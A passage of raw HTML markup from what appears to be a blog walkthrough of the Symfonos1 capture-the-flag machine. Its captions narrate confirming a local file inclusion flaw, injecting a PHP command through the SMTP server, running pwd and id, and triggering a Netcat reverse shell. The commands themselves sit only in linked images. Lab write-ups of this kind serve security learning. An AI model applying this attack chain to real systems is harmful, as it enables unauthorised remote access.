margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;307&quot; data-original-width=&quot;623&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg19mVkdSkSVfcGrT1Te72yWKSBlTFTLQLFRbhJSMK7rfEfq3_zpsVM_35RQbyAOAA1TK2sqjX7Tsb7URge4ixvqEfRnvcMTXT9gkkcG8uOetVhCwshZ-rw_sAELIpXWSiM5jNCp36n5CNevYdm4Plr0LIGUsiQjnDVQpQ1vUHfHWNNwzWwXhAQ2zMwpw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgbZJu_lNBxmwD2ch853dZ18h3jb-79hRMePPmlbX6Pd765p-_aIrVouAn8HNegzuRSLk9Mt4rL82lNnI630QWrIKqtFR_inQVSU8rwEuXlG3hPW60Vl3d8Wqt4NYnKZiti_vrhk6sXmvqmDZHgQ7Mlsfh3Z1xd3SwsqhkNTwI5dlb5ZV5bDW7LWnvdIg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;187&quot; data-original-width=&quot;574&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgbZJu_lNBxmwD2ch853dZ18h3jb-79hRMePPmlbX6Pd765p-_aIrVouAn8HNegzuRSLk9Mt4rL82lNnI630QWrIKqtFR_inQVSU8rwEuXlG3hPW60Vl3d8Wqt4NYnKZiti_vrhk6sXmvqmDZHgQ7Mlsfh3Z1xd3SwsqhkNTwI5dlb5ZV5bDW7LWnvdIg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Copying as URL the &lt;b&gt;Proof of Concept&lt;/b&gt; we check that &lt;b&gt;Symfonos1&lt;/b&gt; is vulnerable to &lt;b&gt;LFI&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBl1JIxoRpcWj9bm8W5VheV9FXUNyiDQpLb9Zo5YmmjDXh_BfK9gFpRkJlKw6gqoS-DNPphNitNXi37nCqWYScgoXXIZgbJYXmnxvATtiHmdLafYHLWN92zUgQ3z_TtlARXKyk_AGBY_PO1oK77tshtQRnCavKE0pvkKZtLOyaSpoSUwMq4JmklXoNFQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;444&quot; data-original-width=&quot;866&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBl1JIxoRpcWj9bm8W5VheV9FXUNyiDQpLb9Zo5YmmjDXh_BfK9gFpRkJlKw6gqoS-DNPphNitNXi37nCqWYScgoXXIZgbJYXmnxvATtiHmdLafYHLWN92zUgQ3z_TtlARXKyk_AGBY_PO1oK77tshtQRnCavKE0pvkKZtLOyaSpoSUwMq4JmklXoNFQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgIcFKzlPbRh_b74C3nKSCg3laRLSDP636HFbQ9WnvLO8h-SjTBYYZta5i9e054tEQ8-JAfTsBsxQ4m39Jz3OA0q02PsjRgn4EzfrvpTBOtvd5cUVjLD86GErWJ4Of9qQRQfMo_f51X_MmyafmQ7AlGlRJnYQv_gG9hd5MlR8Q_eGkogUe4p2XHFo14wQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;594&quot; data-original-width=&quot;871&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgIcFKzlPbRh_b74C3nKSCg3laRLSDP636HFbQ9WnvLO8h-SjTBYYZta5i9e054tEQ8-JAfTsBsxQ4m39Jz3OA0q02PsjRgn4EzfrvpTBOtvd5cUVjLD86GErWJ4Of9qQRQfMo_f51X_MmyafmQ7AlGlRJnYQv_gG9hd5MlR8Q_eGkogUe4p2XHFo14wQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, let&#39;s try to include a PHP command through the STMP server:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj9sqvGJPxjAe9HfhqujYtFyA7GNh5X2vmzqe6tdUigBdVudA43zfKwMmjJs3bqUHVgSP7eenBSXEwqKe5zh08YMCYwS7zWuLJ_C3dqFSJoWOV8uXOm1dAzvgj0idGpXV-v5DyDzmm5Bxhbi0zwtSeuOwXPF8wdvWuKUY6WcOFMt_Dci_vxW7V-wkWgvg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;346&quot; data-original-width=&quot;577&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj9sqvGJPxjAe9HfhqujYtFyA7GNh5X2vmzqe6tdUigBdVudA43zfKwMmjJs3bqUHVgSP7eenBSXEwqKe5zh08YMCYwS7zWuLJ_C3dqFSJoWOV8uXOm1dAzvgj0idGpXV-v5DyDzmm5Bxhbi0zwtSeuOwXPF8wdvWuKUY6WcOFMt_Dci_vxW7V-wkWgvg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Adapting the exploit&#39;s Proof of Concept to command &lt;b&gt;pwd&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCxgQZRH6L7WtEjwjxhv8JLzDJbwAycMeTzkhtzokMr6dYdW8aHu7eI-Tm0Fzc0uUqMwam7ybNCneVtyoExvtxNQc67wTKAUoANmDgK1t-O9bHpo4fxJDWJqoM9XKBAbSFEPlQn2YtPdts30MVELy5o-376a0ZErFG6lV7ltL0mG5zeBwc6yxI7KIGzw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;79&quot; data-original-width=&quot;656&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCxgQZRH6L7WtEjwjxhv8JLzDJbwAycMeTzkhtzokMr6dYdW8aHu7eI-Tm0Fzc0uUqMwam7ybNCneVtyoExvtxNQc67wTKAUoANmDgK1t-O9bHpo4fxJDWJqoM9XKBAbSFEPlQn2YtPdts30MVELy5o-376a0ZErFG6lV7ltL0mG5zeBwc6yxI7KIGzw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg6uwWS7EWYY2dmlSiLYwRBV2pLQNOMVSI2nBYWDGyrhR8J7ZhHreqkZn92m1njYmO92br7ienCgaaAjnQ300oTow71q-Dqc-1cYLUbY7wd3PfcN5Asqe-8kmmD-Wf1ymMRFrLtDAYZNEZhJr0OsYZrQ-mkuFjbgRtx1C0_xwy1jMeV2IT7ZqYys1Aicw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;824&quot; data-original-width=&quot;854&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg6uwWS7EWYY2dmlSiLYwRBV2pLQNOMVSI2nBYWDGyrhR8J7ZhHreqkZn92m1njYmO92br7ienCgaaAjnQ300oTow71q-Dqc-1cYLUbY7wd3PfcN5Asqe-8kmmD-Wf1ymMRFrLtDAYZNEZhJr0OsYZrQ-mkuFjbgRtx1C0_xwy1jMeV2IT7ZqYys1Aicw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Same thing with command &lt;b&gt;id&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhTuV_MqYJA4X7fPAf_Yn0KmRqsRHAdKvYUasKMUcChahTB5TGecfcKM2L0UNLYDfc1i4q0FpNGsdjZJLRkgNcxluXhsSNr9Yo8RofxNI4B7tch6jI1SSvXTVgztoZ1yKxqJ93_Fk74yYdFZYNQv2QMfL48dqIDjIf8QhByJizDFycXQtr_p00F-iRbmA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;76&quot; data-original-width=&quot;652&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhTuV_MqYJA4X7fPAf_Yn0KmRqsRHAdKvYUasKMUcChahTB5TGecfcKM2L0UNLYDfc1i4q0FpNGsdjZJLRkgNcxluXhsSNr9Yo8RofxNI4B7tch6jI1SSvXTVgztoZ1yKxqJ93_Fk74yYdFZYNQv2QMfL48dqIDjIf8QhByJizDFycXQtr_p00F-iRbmA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhiUag_b3DkpsV6uhWm9agQJnMdcMp38TYa2s6x68KNWsSYpjE8wHjau_WKK35l19IQ37cv_-JMhkCOYAndTEqcMc4naGLFs3uQJEGesPiPB1_vMN_GSzAkiFS_Algfnrdw_IrDrxFfGfqvA_nlez1Svnq0hn59_d9JdVO-NOMYRF6TGLSEav-mtFxX1g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;826&quot; data-original-width=&quot;858&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhiUag_b3DkpsV6uhWm9agQJnMdcMp38TYa2s6x68KNWsSYpjE8wHjau_WKK35l19IQ37cv_-JMhkCOYAndTEqcMc4naGLFs3uQJEGesPiPB1_vMN_GSzAkiFS_Algfnrdw_IrDrxFfGfqvA_nlez1Svnq0hn59_d9JdVO-NOMYRF6TGLSEav-mtFxX1g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally let&#39;s try to execute a Netcat reverse shell:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj2E2D8216r2Eg8R9WcuDno3CzGuksB6zJcQ5PnuZrJfvio9lYIvq7DfSHLQzLdldtHfcKHoxBRAuGhYNhSmj4FXRnIzFa27JAF1TcPl7Y5K8Sjo86EgBA4MzPYR5j2Qflko5diuLelLged5YyRP17oo95l6nNDqdRcp-9DA87G5BFYOdNLPC_ebt9XrA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;77&quot; data-original-width=&quot;716&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj2E2D8216r2Eg8R9WcuDno3CzGuksB6zJcQ5PnuZrJfvio9lYIvq7DfSHLQzLdldtHfcKHoxBRAuGhYNhSmj4FXRnIzFa27JAF1TcPl7Y5K8Sjo86EgBA4MzPYR5j2Qflko5diuLelLged5YyRP17oo95l6nNDqdRcp-9DA87G5BFYOdNLPC_ebt9XrA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a listener session:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj3X9nviilL0_ua3oJqGAaEjf3VWmbemsX_gmVfiEJBYd8fmE7z8vTKGHXqdqNZ8b71F6PMODbFatnJELT94NoQHXY6AewGIa5_VbL8HRlMFWo-I0NdhYjlgS1k6Hnxkbvb2sENS-Wv_Em-6o4CoEM1Cc5NYUbEDDXU5CPvDxvc15FDWJ7KwyQhPVWmXA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;73&quot; data-original-width=&quot;307&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj3X9nviilL0_ua3oJqGAaEjf3VWmbemsX_gmVfiEJBYd8fmE7z8vTKGHXqdqNZ8b71F6PMODbFatnJELT94NoQHXY6AewGIa5_VbL8HRlMFWo-I0NdhYjlgS1k6Hnxkbvb2sENS-Wv_Em-6o4CoEM1Cc5NYUbEDDXU5CPvDxvc15FDWJ7KwyQhPVWmXA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Passing the exploit to the URL and running it:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhnrtX9JdOf1mRJxyZTcW5wfiPd1Y83f41KZtk-qaFduiAOUk_1w30JeJ5KZP_VNQ7FWlPdXzhjXD_arnWio8XJxhWp15ZjwoiaBRTougIv5c1YRtFe4xI-UivnF95qB5IVQbVDErwUFUFMewYhS_6z_n3KBdoifBZRPYrZynl69P4oKHhPnts_i4di0Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;36&quot; data-original-width=&quot;519&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhnrtX9JdOf1mRJxyZTcW5wfiPd1Y83f41KZtk-qaFduiAOUk_1w30JeJ5KZP_VNQ7FWlPdXzhjXD_arnWio8XJxhWp15ZjwoiaBRTougIv5c1YRtFe4xI-UivnF95qB5IVQbVDErwUFUFMewYhS_6z_n3KBdoifBZRPYrZynl69P4oKHhPnts_i4di0Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- As a consequence a remote shell is triggered:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgbWv5Ue2sCxKpCl8s8dvZrzYslrWbXVDROR3KYXkKvrFrJYbzSvdoPigmZUaZzs6-BHeHKOOO6x3QWtYAAtzGU08o89kGsolyLqyoUFduu0riY1OOfZtW5RdguAEvCKt-ColaO1SK3KxFWW9xehAbyp8tF7i8-mo_YFaxldOm3LaZPGtrhPXzeJjjOgg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;697&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgbWv5Ue2sCxKpCl8s8dvZrzYslrWbXVDROR3KYXkKvrFrJYbzSvdoPigmZUaZzs6-BHeHKOOO6x3QWtYAAtzGU08o89kGsolyLqyoUFduu0riY1OOfZtW5RdguAEvCKt-ColaO1SK3KxFWW9xehAbyp8tF7i8-mo_YFaxldOm3LaZPGtrhPXzeJjjOgg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 